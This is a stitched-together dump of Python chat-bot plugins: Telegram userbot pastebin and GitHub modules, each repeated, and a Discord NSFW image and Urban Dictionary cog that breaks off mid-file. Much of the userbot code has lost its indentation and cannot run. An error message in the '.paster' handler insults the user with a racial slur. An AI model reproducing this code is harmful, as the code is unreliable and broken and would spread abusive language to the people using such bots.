nurl = f"https://del.dog/v/{r["key"]}"
await event.edit("Dogged to {} in {} seconds. GoTo Original URL: {}".format(url, ms, nurl))
else:
await event.edit("Dogged to {} in {} seconds".format(url, ms))
@borg.on(admin_cmd(outgoing=True, pattern="getpaste(?: |$)(.*)"))
async def get_dogbin_content(dog_url):
    """ For .getpaste command, fetches the content of a dogbin URL. """
    # NOTE: `dog_url` is the triggering Telethon event, not a plain URL string.
    textx = await dog_url.get_reply_message()
    message = dog_url.pattern_match.group(1)
    await dog_url.edit("`Getting dogbin content...`")
    if textx:
        message = str(textx.message)
    # Accept full, view (/v/) and scheme-less dogbin URLs; strip the prefix so
    # only the paste key remains.
    format_normal = f'{DOGBIN_URL}'
    format_view = f'{DOGBIN_URL}v/'
    if message.startswith(format_view):
        message = message[len(format_view):]
    elif message.startswith(format_normal):
        message = message[len(format_normal):]
    elif message.startswith("del.dog/"):
        message = message[len("del.dog/"):]
    else:
        await dog_url.edit("`Is that even a dogbin url?`")
        return
    resp = get(f'{DOGBIN_URL}raw/{message}')
    try:
        resp.raise_for_status()
    except exceptions.HTTPError as HTTPErr:
        await dog_url.edit(
            "Request returned an unsuccessful status code.\n\n" + str(HTTPErr))
        return
    except exceptions.Timeout as TimeoutErr:
        await dog_url.edit("Request timed out." + str(TimeoutErr))
        return
    except exceptions.TooManyRedirects as RedirectsErr:
        await dog_url.edit(
            "Request exceeded the configured number of maximum redirections." +
            str(RedirectsErr))
        return
    reply_text = "`Fetched dogbin URL content successfully!`\n\n`Content:` " + resp.text
    await dog_url.edit(reply_text)
    # Mirror a success note to the private log group when logging is enabled.
    if BOTLOG:
        await dog_url.client.send_message(
            BOTLOG_CHATID,
            "Get dogbin content query was executed successfully",
        )
@borg.on(admin_cmd(pattern="npaste ?(.*)"))
async def _(event):
if event.fwd_from:
return
start = datetime.now()
if not os.path.isdir(Config.TMP_DOWNLOAD_DIRECTORY):
os.makedirs(Config.TMP_DOWNLOAD_DIRECTORY)
input_str = event.pattern_match.group(1)
message = "SYNTAX: `.npaste <long text to include>`"
if input_str:
message = input_str
elif event.reply_to_msg_id:
previous_message = await event.get_reply_message()
if previous_message.media:
downloaded_file_name = await borg.download_media(
previous_message,
Config.TMP_DOWNLOAD_DIRECTORY,
progress_callback=progress
)
m_list = None
with open(downloaded_file_name, "rb") as fd:
m_list = fd.readlines()
message = ""
for m in m_list:
# message += m.decode("UTF-8") + "\r\n"
message += m.decode("UTF-8")
os.remove(downloaded_file_name)
else:
message = previous_message.message
else:
message = "SYNTAX: `.npaste <long text to include>`"
py_file = ""
if downloaded_file_name.endswith(".py"):
py_file += ".py"
data = message
key = requests.post('https://nekobin.com/api/documents', json={"content": data}).json().get('result').get('key')
url = f'https://nekobin.com/{key}{py_file}'
reply_text = f'Nekofied to *Nekobin* : {url}'
await event.edit(reply_text)
else:
data = message
key = requests.post('https://nekobin.com/api/documents', json={"content": data}).json().get('result').get('key')
url = f'https://nekobin.com/{key}'
reply_text = f'Nekofied to *Nekobin* : {url}'
await event.edit(reply_text)
@borg.on(admin_cmd(pattern="iffuci ?(.*)"))
async def _(event):
if event.fwd_from:
return
start = datetime.now()
if not os.path.isdir(Config.TMP_DOWNLOAD_DIRECTORY):
os.makedirs(Config.TMP_DOWNLOAD_DIRECTORY)
input_str = event.pattern_match.group(1)
message = "SYNTAX: `.iffuci <long text to include>`"
if input_str:
message = input_str
elif event.reply_to_msg_id:
previous_message = await event.get_reply_message()
if previous_message.media:
downloaded_file_name = await borg.download_media(
previous_message,
Config.TMP_DOWNLOAD_DIRECTORY,
progress_callback=progress
)
m_list = None
with open(downloaded_file_name, "rb") as fd:
m_list = fd.readlines()
message = ""
for m in m_list:
message += m.decode("UTF-8") + "\r\n"
os.remove(downloaded_file_name)
else:
message = previous_message.message
else:
message = "SYNTAX: `.iffuci <long text to include>`"
url = "https://www.iffuci.tk/documents"
r = requests.post(url, data=message.encode("UTF-8")).json()
url = f"https://iffuci.tk/{r["key"]}"
end = datetime.now()
ms = (end - start).seconds
if r["isUrl"]:
nurl = f"https://iffuci.tk/v/{r["key"]}"
await event.edit("code is pasted to {} in {} seconds. GoTo Original URL: {}".format(url, ms, nurl))
else:
await event.edit("code is pasted to {} in {} seconds".format(url, ms))
@borg.on(admin_cmd(pattern="paster ?(.*)"))
async def _(event):
if event.fwd_from:
return
start = datetime.now()
reply_message = await event.get_reply_message()
if not os.path.isdir(Config.TMP_DOWNLOAD_DIRECTORY):
os.makedirs(Config.TMP_DOWNLOAD_DIRECTORY)
input_str = event.pattern_match.group(1)
message = "SYNTAX: `.paste <long text to include>`"
if input_str:
message = input_str
elif event.reply_to_msg_id:
previous_message = await event.get_reply_message()
if previous_message.media:
downloaded_file_name = await borg.download_media(
previous_message,
Config.TMP_DOWNLOAD_DIRECTORY,
progress_callback=progress
)
m_list = None
with open(downloaded_file_name, "rb") as fd:
m_list = fd.readlines()
message = ""
for m in m_list:
message += m.decode("UTF-8") + "\r\n"
os.remove(downloaded_file_name)
else:
message = previous_message.message
else:
message = "SYNTAX: `.paste <long text to include>`"
url = "https://del.dog/documents"
r = requests.post(url, data=message.encode("UTF-8")).json()
url = f"https://del.dog/{r["key"]}"
chat = "@chotamreaderbot"
if r["isUrl"]:
nurl = f"https://del.dog/v/{r["key"]}"
await event.edit("Dogged to {} in {} seconds. GoTo Original URL: {}".format(url, ms, nurl))
#This module is modded by @ViperAdnan #KeepCredit
else:
await event.edit("**Making instant view...**")
async with event.client.conversation(chat) as conv:
try:
response = conv.wait_event(events.NewMessage(incoming=True,from_users=272572121))
await event.client.send_message(chat, url)
response = await response
except YouBlockedUserError:
await event.reply("```Please unblock me (@chotamreaderbot) u Nigga```")
return
await event.delete()
await event.client.send_message(event.chat_id, response.message, reply_to=reply_message)
# Register help text for this module's commands (.paste, .getpaste, .npaste,
# .iffuci, .paster) in the userbot's global help registry (.help pastebin).
CMD_HELP.update({
    "pastebin":
    ".paste <text/reply>\
\nUsage: Create a paste or a shortened url using dogbin (https://del.dog/)\
\n\n.getpaste\
\nUsage: Gets the content of a paste or shortened url from dogbin (https://del.dog/)\
\n\n.npaste <text/reply>\
\nUsage: Create a paste or a shortened url using nekobin (https://nekobin.com)\
\n\n.iffuci <text/reply>\
\nUsage: Create a paste or a shortened url using iffuci (https://www.iffuci.tk)\
\n\n.paster <text/reply>\
\nUsage: Create a instant view or a paste it in telegraph file\
"
})
| """IX.IO pastebin like site
Syntax: .paste
Syntax: .npaste
Syntax: .paster
Syntax: .iffuci
"""
import logging
logging.basicConfig(format='[%(levelname) 5s/%(asctime)s] %(name)s: %(message)s',
level=logging.WARNING)
import asyncio
import os
from datetime import datetime
import requests
from telethon import events
from userbot.utils import admin_cmd
from userbot.uniborgConfig import Config
from telethon.errors.rpcerrorlist import YouBlockedUserError
from requests import exceptions, get, post
def progress(current, total):
    """Log download progress; used as a Telethon ``progress_callback``.

    Args:
        current: bytes downloaded so far.
        total: total bytes expected (must be non-zero).
    """
    # BUGFIX: the original called ``logger.info`` but no ``logger`` name was
    # ever defined in this module (NameError on first media download).
    logging.getLogger(__name__).info(
        "Downloaded {} of {}\nCompleted {}".format(
            current, total, (current / total) * 100
        )
    )
from userbot import CMD_HELP, LOGS, TEMP_DOWNLOAD_DIRECTORY
DOGBIN_URL = "https://del.dog/"
BOTLOG_CHATID = Config.PRIVATE_GROUP_BOT_API_ID
BOTLOG = True
@borg.on(admin_cmd(pattern="paste ?(.*)"))
async def _(event):
if event.fwd_from:
return
start = datetime.now()
if not os.path.isdir(Config.TMP_DOWNLOAD_DIRECTORY):
os.makedirs(Config.TMP_DOWNLOAD_DIRECTORY)
input_str = event.pattern_match.group(1)
message = "SYNTAX: `.paste <long text to include>`"
if input_str:
message = input_str
elif event.reply_to_msg_id:
previous_message = await event.get_reply_message()
if previous_message.media:
downloaded_file_name = await borg.download_media(
previous_message,
Config.TMP_DOWNLOAD_DIRECTORY,
progress_callback=progress
)
m_list = None
with open(downloaded_file_name, "rb") as fd:
m_list = fd.readlines()
message = ""
for m in m_list:
message += m.decode("UTF-8") + "\r\n"
os.remove(downloaded_file_name)
else:
message = previous_message.message
else:
message = "SYNTAX: `.paste <long text to include>`"
url = "https://del.dog/documents"
r = requests.post(url, data=message.encode("UTF-8")).json()
url = f"https://del.dog/{r['key']}"
end = datetime.now()
ms = (end - start).seconds
if r["isUrl"]:
nurl = f"https://del.dog/v/{r['key']}"
await event.edit("Dogged to {} in {} seconds. GoTo Original URL: {}".format(url, ms, nurl))
else:
await event.edit("Dogged to {} in {} seconds".format(url, ms))
@borg.on(admin_cmd(outgoing=True, pattern="getpaste(?: |$)(.*)"))
async def get_dogbin_content(dog_url):
    """ For .getpaste command, fetches the content of a dogbin URL. """
    # NOTE: `dog_url` is the triggering Telethon event, not a plain URL string.
    textx = await dog_url.get_reply_message()
    message = dog_url.pattern_match.group(1)
    await dog_url.edit("`Getting dogbin content...`")
    if textx:
        message = str(textx.message)
    # Accept full, view (/v/) and scheme-less dogbin URLs; strip the prefix so
    # only the paste key remains.
    format_normal = f'{DOGBIN_URL}'
    format_view = f'{DOGBIN_URL}v/'
    if message.startswith(format_view):
        message = message[len(format_view):]
    elif message.startswith(format_normal):
        message = message[len(format_normal):]
    elif message.startswith("del.dog/"):
        message = message[len("del.dog/"):]
    else:
        await dog_url.edit("`Is that even a dogbin url?`")
        return
    resp = get(f'{DOGBIN_URL}raw/{message}')
    try:
        resp.raise_for_status()
    except exceptions.HTTPError as HTTPErr:
        await dog_url.edit(
            "Request returned an unsuccessful status code.\n\n" + str(HTTPErr))
        return
    except exceptions.Timeout as TimeoutErr:
        await dog_url.edit("Request timed out." + str(TimeoutErr))
        return
    except exceptions.TooManyRedirects as RedirectsErr:
        await dog_url.edit(
            "Request exceeded the configured number of maximum redirections." +
            str(RedirectsErr))
        return
    reply_text = "`Fetched dogbin URL content successfully!`\n\n`Content:` " + resp.text
    await dog_url.edit(reply_text)
    # Mirror a success note to the private log group when logging is enabled.
    if BOTLOG:
        await dog_url.client.send_message(
            BOTLOG_CHATID,
            "Get dogbin content query was executed successfully",
        )
@borg.on(admin_cmd(pattern="npaste ?(.*)"))
async def _(event):
if event.fwd_from:
return
start = datetime.now()
if not os.path.isdir(Config.TMP_DOWNLOAD_DIRECTORY):
os.makedirs(Config.TMP_DOWNLOAD_DIRECTORY)
input_str = event.pattern_match.group(1)
message = "SYNTAX: `.npaste <long text to include>`"
if input_str:
message = input_str
elif event.reply_to_msg_id:
previous_message = await event.get_reply_message()
if previous_message.media:
downloaded_file_name = await borg.download_media(
previous_message,
Config.TMP_DOWNLOAD_DIRECTORY,
progress_callback=progress
)
m_list = None
with open(downloaded_file_name, "rb") as fd:
m_list = fd.readlines()
message = ""
for m in m_list:
# message += m.decode("UTF-8") + "\r\n"
message += m.decode("UTF-8")
os.remove(downloaded_file_name)
else:
message = previous_message.message
else:
message = "SYNTAX: `.npaste <long text to include>`"
py_file = ""
if downloaded_file_name.endswith(".py"):
py_file += ".py"
data = message
key = requests.post('https://nekobin.com/api/documents', json={"content": data}).json().get('result').get('key')
url = f'https://nekobin.com/{key}{py_file}'
reply_text = f'Nekofied to *Nekobin* : {url}'
await event.edit(reply_text)
else:
data = message
key = requests.post('https://nekobin.com/api/documents', json={"content": data}).json().get('result').get('key')
url = f'https://nekobin.com/{key}'
reply_text = f'Nekofied to *Nekobin* : {url}'
await event.edit(reply_text)
@borg.on(admin_cmd(pattern="iffuci ?(.*)"))
async def _(event):
if event.fwd_from:
return
start = datetime.now()
if not os.path.isdir(Config.TMP_DOWNLOAD_DIRECTORY):
os.makedirs(Config.TMP_DOWNLOAD_DIRECTORY)
input_str = event.pattern_match.group(1)
message = "SYNTAX: `.iffuci <long text to include>`"
if input_str:
message = input_str
elif event.reply_to_msg_id:
previous_message = await event.get_reply_message()
if previous_message.media:
downloaded_file_name = await borg.download_media(
previous_message,
Config.TMP_DOWNLOAD_DIRECTORY,
progress_callback=progress
)
m_list = None
with open(downloaded_file_name, "rb") as fd:
m_list = fd.readlines()
message = ""
for m in m_list:
message += m.decode("UTF-8") + "\r\n"
os.remove(downloaded_file_name)
else:
message = previous_message.message
else:
message = "SYNTAX: `.iffuci <long text to include>`"
url = "https://www.iffuci.tk/documents"
r = requests.post(url, data=message.encode("UTF-8")).json()
url = f"https://iffuci.tk/{r['key']}"
end = datetime.now()
ms = (end - start).seconds
if r["isUrl"]:
nurl = f"https://iffuci.tk/v/{r['key']}"
await event.edit("code is pasted to {} in {} seconds. GoTo Original URL: {}".format(url, ms, nurl))
else:
await event.edit("code is pasted to {} in {} seconds".format(url, ms))
@borg.on(admin_cmd(pattern="paster ?(.*)"))
async def _(event):
if event.fwd_from:
return
start = datetime.now()
reply_message = await event.get_reply_message()
if not os.path.isdir(Config.TMP_DOWNLOAD_DIRECTORY):
os.makedirs(Config.TMP_DOWNLOAD_DIRECTORY)
input_str = event.pattern_match.group(1)
message = "SYNTAX: `.paste <long text to include>`"
if input_str:
message = input_str
elif event.reply_to_msg_id:
previous_message = await event.get_reply_message()
if previous_message.media:
downloaded_file_name = await borg.download_media(
previous_message,
Config.TMP_DOWNLOAD_DIRECTORY,
progress_callback=progress
)
m_list = None
with open(downloaded_file_name, "rb") as fd:
m_list = fd.readlines()
message = ""
for m in m_list:
message += m.decode("UTF-8") + "\r\n"
os.remove(downloaded_file_name)
else:
message = previous_message.message
else:
message = "SYNTAX: `.paste <long text to include>`"
url = "https://del.dog/documents"
r = requests.post(url, data=message.encode("UTF-8")).json()
url = f"https://del.dog/{r['key']}"
chat = "@chotamreaderbot"
if r["isUrl"]:
nurl = f"https://del.dog/v/{r['key']}"
await event.edit("Dogged to {} in {} seconds. GoTo Original URL: {}".format(url, ms, nurl))
#This module is modded by @ViperAdnan #KeepCredit
else:
await event.edit("**Making instant view...**")
async with event.client.conversation(chat) as conv:
try:
response = conv.wait_event(events.NewMessage(incoming=True,from_users=272572121))
await event.client.send_message(chat, url)
response = await response
except YouBlockedUserError:
await event.reply("```Please unblock me (@chotamreaderbot) u Nigga```")
return
await event.delete()
await event.client.send_message(event.chat_id, response.message, reply_to=reply_message)
# Register help text for this module's commands (.paste, .getpaste, .npaste,
# .iffuci, .paster) in the userbot's global help registry (.help pastebin).
CMD_HELP.update({
    "pastebin":
    ".paste <text/reply>\
\nUsage: Create a paste or a shortened url using dogbin (https://del.dog/)\
\n\n.getpaste\
\nUsage: Gets the content of a paste or shortened url from dogbin (https://del.dog/)\
\n\n.npaste <text/reply>\
\nUsage: Create a paste or a shortened url using nekobin (https://nekobin.com)\
\n\n.iffuci <text/reply>\
\nUsage: Create a paste or a shortened url using iffuci (https://www.iffuci.tk)\
\n\n.paster <text/reply>\
\nUsage: Create a instant view or a paste it in telegraph file\
"
})
|
# Copyright (C) 2019 The Raphielscape Company LLC.
#
# Licensed under the Raphielscape Public License, Version 1.d (the "License");
# you may not use this file except in compliance with the License.
#
import os
import time
from datetime import datetime
import aiohttp
from github import Github
from userbot import CMD_HELP, GIT_REPO_NAME, GITHUB_ACCESS_TOKEN, bot
from userbot.events import register
GIT_TEMP_DIR = "./userbot/temp/"
@register(outgoing=True, disable_errors=True, pattern="^.git(?: |$)(.*)")
async def github(event):
    """.git <username> — show a GitHub user's profile and public repos."""
    username = event.pattern_match.group(1)
    URL = f"https://api.github.com/users/{username}"
    await event.get_chat()
    async with aiohttp.ClientSession() as session, session.get(URL) as request:
        if request.status == 404:
            return await event.reply(f"`{username} not found`")
        result = await request.json()
        url = result.get("html_url", None)
        name = result.get("name", None)
        company = result.get("company", None)
        bio = result.get("bio", None)
        created_at = result.get("created_at", "Not Found")
        REPLY = (
            f"GitHub Info for `{username}`\n"
            f"Username: `{name}`\n"
            f"Bio: `{bio}`\n"
            f"URL: {url}\n"
            f"Company: `{company}`\n"
            f"Created at: `{created_at}`\n"
            f"More info : [Here](https://api.github.com/users/{username}/events/public)")
        if not result.get("repos_url", None):
            return await event.edit(REPLY)
        async with session.get(result.get("repos_url", None)) as request:
            # BUGFIX: removed the dead `result = request.json` assignment —
            # it bound the unawaited coroutine method, not the payload.
            if request.status == 404:
                return await event.edit(REPLY)
            result = await request.json()
            REPLY += "\nRepos:\n"
            # BUGFIX: single quotes inside the f-string — nesting double
            # quotes is a SyntaxError on Python < 3.12; iterate repos
            # directly instead of range(len(...)).
            for repo in result:
                REPLY += f"[{repo.get('name', None)}]({repo.get('html_url', None)})\n"
            await event.edit(REPLY)
@register(outgoing=True, pattern="^.commit(?: |$)(.*)")
async def download(event):
    """Download a replied-to media file and commit it to the configured repo.

    Triggered by ``.commit`` in reply to a media message.  Requires both
    GITHUB_ACCESS_TOKEN and GIT_REPO_NAME to be configured; delegates the
    actual upload to ``git_commit``.
    """
    if event.fwd_from:
        return
    if GITHUB_ACCESS_TOKEN is None:
        await event.edit("`Please ADD Proper Access Token from github.com`")
        return
    if GIT_REPO_NAME is None:
        await event.edit("`Please ADD Proper Github Repo Name of your userbot`"
                         )
        return
    mone = await event.reply("Processing ...")
    if not os.path.isdir(GIT_TEMP_DIR):
        os.makedirs(GIT_TEMP_DIR)
    start = datetime.now()
    reply_message = await event.get_reply_message()
    try:
        # BUG FIX: removed a stray ``time.time()`` call whose result was
        # discarded; elapsed time is measured with the datetime pair below.
        print("Downloading to TEMP directory")
        downloaded_file_name = await bot.download_media(
            reply_message.media, GIT_TEMP_DIR)
    except Exception as e:
        await mone.edit(str(e))
    else:
        # Renamed the misleading local ``ms``: .seconds yields whole seconds.
        seconds = (datetime.now() - start).seconds
        await event.delete()
        await mone.edit("Downloaded to `{}` in {} seconds.".format(
            downloaded_file_name, seconds))
        await mone.edit("Committing to Github....")
        await git_commit(downloaded_file_name, mone)
async def git_commit(file_name, mone):
    """Create ``file_name`` in GIT_REPO_NAME on the ``sql-extended`` branch.

    Reads the downloaded file, bails out when a file with the same path
    already exists in the repo, and reports success/failure via ``mone``.
    """
    content_list = []
    access_token = GITHUB_ACCESS_TOKEN
    g = Github(access_token)
    # BUG FIX: the original leaked the file handle; use a context manager.
    with open(file_name, "r", encoding="utf-8") as file:
        commit_data = file.read()
    repo = g.get_repo(GIT_REPO_NAME)
    print(repo.name)
    create_file = True
    contents = repo.get_contents("")
    for content_file in contents:
        content_list.append(str(content_file))
        print(content_file)
    for i in content_list:
        # Removed a redundant ``create_file = True`` here -- it was already
        # True and the loop never sets it False.
        if i == 'ContentFile(path="' + file_name + '")':
            return await mone.edit("`File Already Exists`")
    # Rewrite the temp-dir download path into the repo's modules directory.
    file_name = "userbot/modules/" + file_name
    if create_file is True:
        file_name = file_name.replace("./userbot/temp/", "")
        print(file_name)
        try:
            repo.create_file(file_name,
                             "Uploaded New Plugin",
                             commit_data,
                             branch="sql-extended")
            print("Committed File")
            ccess = GIT_REPO_NAME
            ccess = ccess.strip()
            await mone.edit(
                f"`Commited On Your Github Repo`\n\n[Your Modules](https://github.com/{ccess}/tree/sql-extended/userbot/modules/)"
            )
        except BaseException:
            print("Cannot Create Plugin")
            await mone.edit("Cannot Upload Plugin")
    else:
        # NOTE(review): ``create_file`` is never set False, so this branch is
        # unreachable as written -- kept for fidelity with the original.
        return await mone.edit("`Committed Suicide`")
# Register user-facing help text for the GitHub module commands.
CMD_HELP.update({
    "github":
    ">`.git` <username>"
    "\nUsage: Like .whois but for GitHub usernames."
    "\n\n>`.commit` <reply file>"
    "\nUsage: GITHUB File Uploader Plugin for userbot. Heroku Automation should be Enabled."
})
| # Copyright (C) 2019 The Raphielscape Company LLC.
#
# Licensed under the Raphielscape Public License, Version 1.d (the "License");
# you may not use this file except in compliance with the License.
#
import os
import time
from datetime import datetime
import aiohttp
from github import Github
from userbot import CMD_HELP, GIT_REPO_NAME, GITHUB_ACCESS_TOKEN, bot
from userbot.events import register
GIT_TEMP_DIR = "./userbot/temp/"
@register(outgoing=True, disable_errors=True, pattern="^.git(?: |$)(.*)")
async def github(event):
    """Reply with public GitHub profile info (and repo list) for a username.

    Triggered by ``.git <username>``.  Queries the GitHub REST API; replies
    "not found" on a 404, otherwise edits the reply with profile details and,
    when available, the user's repositories.
    """
    username = event.pattern_match.group(1)
    URL = f"https://api.github.com/users/{username}"
    await event.get_chat()
    async with aiohttp.ClientSession() as session, session.get(URL) as request:
        if request.status == 404:
            return await event.reply(f"`{username} not found`")
        result = await request.json()
        url = result.get("html_url", None)
        name = result.get("name", None)
        company = result.get("company", None)
        bio = result.get("bio", None)
        created_at = result.get("created_at", "Not Found")
        REPLY = (
            f"GitHub Info for `{username}`\n"
            f"Username: `{name}`\n"
            f"Bio: `{bio}`\n"
            f"URL: {url}\n"
            f"Company: `{company}`\n"
            f"Created at: `{created_at}`\n"
            f"More info : [Here](https://api.github.com/users/{username}/events/public)")
        if not result.get("repos_url", None):
            return await event.edit(REPLY)
        async with session.get(result.get("repos_url", None)) as request:
            # BUG FIX: the original assigned the un-awaited ``request.json``
            # method here before the status check; the value was dead and
            # misleading, so it is removed.
            if request.status == 404:
                return await event.edit(REPLY)
            result = await request.json()
            REPLY += "\nRepos:\n"
            for repo in result:
                REPLY += f"[{repo.get('name', None)}]({repo.get('html_url', None)})\n"
            await event.edit(REPLY)
@register(outgoing=True, pattern="^.commit(?: |$)(.*)")
async def download(event):
    """Download a replied-to media file and commit it to the configured repo.

    Triggered by ``.commit`` in reply to a media message.  Requires both
    GITHUB_ACCESS_TOKEN and GIT_REPO_NAME to be configured; delegates the
    actual upload to ``git_commit``.
    """
    if event.fwd_from:
        return
    if GITHUB_ACCESS_TOKEN is None:
        await event.edit("`Please ADD Proper Access Token from github.com`")
        return
    if GIT_REPO_NAME is None:
        await event.edit("`Please ADD Proper Github Repo Name of your userbot`"
                         )
        return
    mone = await event.reply("Processing ...")
    if not os.path.isdir(GIT_TEMP_DIR):
        os.makedirs(GIT_TEMP_DIR)
    start = datetime.now()
    reply_message = await event.get_reply_message()
    try:
        # BUG FIX: removed a stray ``time.time()`` call whose result was
        # discarded; elapsed time is measured with the datetime pair below.
        print("Downloading to TEMP directory")
        downloaded_file_name = await bot.download_media(
            reply_message.media, GIT_TEMP_DIR)
    except Exception as e:
        await mone.edit(str(e))
    else:
        # Renamed the misleading local ``ms``: .seconds yields whole seconds.
        seconds = (datetime.now() - start).seconds
        await event.delete()
        await mone.edit("Downloaded to `{}` in {} seconds.".format(
            downloaded_file_name, seconds))
        await mone.edit("Committing to Github....")
        await git_commit(downloaded_file_name, mone)
async def git_commit(file_name, mone):
    """Create ``file_name`` in GIT_REPO_NAME on the ``sql-extended`` branch.

    Reads the downloaded file, bails out when a file with the same path
    already exists in the repo, and reports success/failure via ``mone``.
    """
    content_list = []
    access_token = GITHUB_ACCESS_TOKEN
    g = Github(access_token)
    # BUG FIX: the original leaked the file handle; use a context manager.
    with open(file_name, "r", encoding="utf-8") as file:
        commit_data = file.read()
    repo = g.get_repo(GIT_REPO_NAME)
    print(repo.name)
    create_file = True
    contents = repo.get_contents("")
    for content_file in contents:
        content_list.append(str(content_file))
        print(content_file)
    for i in content_list:
        # Removed a redundant ``create_file = True`` here -- it was already
        # True and the loop never sets it False.
        if i == 'ContentFile(path="' + file_name + '")':
            return await mone.edit("`File Already Exists`")
    # Rewrite the temp-dir download path into the repo's modules directory.
    file_name = "userbot/modules/" + file_name
    if create_file is True:
        file_name = file_name.replace("./userbot/temp/", "")
        print(file_name)
        try:
            repo.create_file(file_name,
                             "Uploaded New Plugin",
                             commit_data,
                             branch="sql-extended")
            print("Committed File")
            ccess = GIT_REPO_NAME
            ccess = ccess.strip()
            await mone.edit(
                f"`Commited On Your Github Repo`\n\n[Your Modules](https://github.com/{ccess}/tree/sql-extended/userbot/modules/)"
            )
        except BaseException:
            print("Cannot Create Plugin")
            await mone.edit("Cannot Upload Plugin")
    else:
        # NOTE(review): ``create_file`` is never set False, so this branch is
        # unreachable as written -- kept for fidelity with the original.
        return await mone.edit("`Committed Suicide`")
# Register user-facing help text for the GitHub module commands.
CMD_HELP.update({
    "github":
    ">`.git` <username>"
    "\nUsage: Like .whois but for GitHub usernames."
    "\n\n>`.commit` <reply file>"
    "\nUsage: GITHUB File Uploader Plugin for userbot. Heroku Automation should be Enabled."
})
|
import discord
from checks.checks import *
from random import choice
from discord.ext import commands
from discord.ext.commands.cooldowns import BucketType
class NSFW:
    """NSFW Commands 🔞"""

    # NOTE(review): on discord.py >= 1.0 cogs must inherit commands.Cog --
    # confirm the target library version before changing the base class.
    def __init__(self, bot):
        self.bot = bot
        self.thumbnail = "https://i.imgur.com/ivmKTvu.png"
        # Tag names accepted by the nekos.life v2 image endpoint.
        self.tags = (
            "feet",
            "yuri",
            "trap",
            "futanari",
            "hololewd",
            "lewdkemo",
            "solog",
            "feetg",
            "cum",
            "erokemo",
            "les",
            "wallpaper",
            "lewdk",
            "ngif",
            "meow",
            "tickle",
            "lewd",
            "feed",
            "gecg",
            "eroyuri",
            "eron",
            "cum_jpg",
            "bj",
            "nsfw_neko_gif",
            "solo",
            "kemonomimi",
            "nsfw_avatar",
            "gasm",
            "poke",
            "anal",
            "slap",
            "hentai",
            "avatar",
            "erofeet",
            "holo",
            "keta",
            "blowjob",
            "pussy",
            "tits",
            "holoero",
            "lizard",
            "pussy_jpg",
            "pwankg",
            "classic",
            "kuni",
            "waifu",
            "pat",
            "8ball",
            "kiss",
            "femdom",
            "neko",
            "spank",
            "cuddle",
            "erok",
            "fox_girl",
            "boobs",
            "Random_hentai_gif",
            "smallboobs",
            "hug",
            "ero",
        )

    @nsfw()
    @commands.command(
        name="neko",
        aliases=(
            "catgirl",
            "hentai"
        )
    )
    @commands.cooldown(
        1.0, 5.0, commands.BucketType.user
    )
    async def _neko(self, ctx, *, tag: str.lower = None):
        """
        Gives you random neko picture. Channel must be NSFW to use this command. Leave the tag field empty to randomize neko.
        ---
        Tags are: feet, yuri, trap, futanari, hololewd, lewdkemo, solog, feetg,
        cum, erokemo, les, wallpaper, lewdk, ngif, meow, tickle, lewd, feed, gecg,
        eroyuri, eron, cum_jpg, bj, nsfw_neko_gif, solo, kemonomimi, nsfw_avatar,
        gasm, poke, anal, slap, hentai, avatar, erofeet, holo, keta, blowjob, pussy,
        tits, holoero, lizard, pussy_jpg, pwankg, classic, kuni, waifu, pat, 8ball, kiss,
        femdom, neko, spank, cuddle, erok, fox_girl, boobs, Random_hentai_gif, smallboobs,
        hug, ero
        """
        try:
            if tag is None:
                tag = choice(
                    self.tags
                )
            # The API expects this one tag capitalized.
            if tag == "random_hentai_gif":
                tag = tag.capitalize()
            async with self.bot.session.get(
                f"https://nekos.life/api/v2/img/{tag}"
            ) as resp:
                data = await resp.json()
                embedneko = discord.Embed(
                    color=self.bot.color,
                    title=f"Neko :3 - {tag}",
                    timestamp=ctx.message.created_at,
                )
                # BUG FIX: f-strings below originally nested same-kind quotes
                # (a SyntaxError before Python 3.12); inner quotes flipped.
                embedneko.set_image(url=f'{data.get("url")}')
                embedneko.set_footer(
                    text=f"Requested by: {ctx.author}",
                    icon_url=ctx.author.avatar_url)
                await ctx.send(embed=embedneko)
        except Exception as exc:
            await self.bot.error(
                ctx = ctx,
                exc = exc,
            )

    @nsfw()
    @commands.command(
        aliases=(
            "urb",
            "ud",
            "urban"
        )
    )
    @commands.cooldown(
        1.0, 10.0, commands.BucketType.user
    )
    async def urbandictionary(self, ctx, *, urbanword):
        """
        Looks up for word in Urban Dictionary
        For example, @Astonish ud cat will give you definition and more of word 'cat'
        """
        try:
            async with self.bot.session.get(
                f"http://api.urbandictionary.com/v0/define?term={urbanword}"
            ) as resp:
                data = await resp.json()
            # Probe the first result; self.bot.error reports malformed/empty data.
            try:
                data["list"][0].get("word")
            except Exception as exc:
                await self.bot.error(
                    ctx = ctx,
                    exc = exc,
                )
            else:
                async with self.bot.session.get(
                    f"http://api.urbandictionary.com/v0/define?term={urbanword}"
                ) as resp:
                    data = await resp.json()
                definition = data["list"][0].get("definition")
                example = data["list"][0].get("example")
                # BUG FIX: these were chained with elif, so an empty example
                # was not normalized whenever the definition was also empty.
                # NOTE(review): ``example`` is never rendered below.
                if definition == "":
                    definition = "No definition(s)."
                if example == "":
                    example = "No example(s)."
                try:
                    if len(definition) >= 2000:
                        raise Exception("The definition is too long.")
                    else:
                        embed = discord.Embed(color=self.bot.color)
                        embed.add_field(
                            name="**:baby_bottle: Definition**",
                            value=definition,
                            inline=True,
                        )
                        embed.add_field(
                            name="**:link: Permalink**",
                            value=f'**[➤ Click Me!]({data["list"][0].get("permalink")})**',
                            inline=True,
                        )
                        embed.add_field(
                            name="**:notebook_with_decorative_cover: Word by**",
                            value=f'**{data["list"][0].get("author")}**',
                            inline=True,
                        )
                        embed.add_field(
                            name="**:pen_ballpoint: Written on**",
                            value=f'**{data["list"][0].get("written_on")}**',
                            inline=True,
                        )
                        embed.add_field(
                            name="**:star: Rating**",
                            value=f':thumbsup: **{data["list"][0].get("thumbs_up")}**\n:thumbsdown: **{data["list"][0].get("thumbs_down")}**',
                            inline=True,
                        )
                        embed.set_thumbnail(
                            url=ctx.author.avatar_url,
                        )
                        await ctx.send(
                            embed=embed,
                        )
                except Exception as exc:
                    await ctx.send(
                        f"{self.bot.tick(False)} | **Maybe, the definition is too long**",
                        delete_after=5,
                    )
        except Exception as exc:
            await ctx.send(
                f"{self.bot.tick(False)} | **Error or no results found for your query**",
                delete_after=5,
            )
def setup(bot):
    # Standard discord.py extension entry point: attach the NSFW cog.
    bot.add_cog(NSFW(bot))
| import discord
from checks.checks import *
from random import choice
from discord.ext import commands
from discord.ext.commands.cooldowns import BucketType
class NSFW:
    """NSFW Commands 🔞"""

    # NOTE(review): on discord.py >= 1.0 cogs must inherit commands.Cog --
    # confirm the target library version before changing the base class.
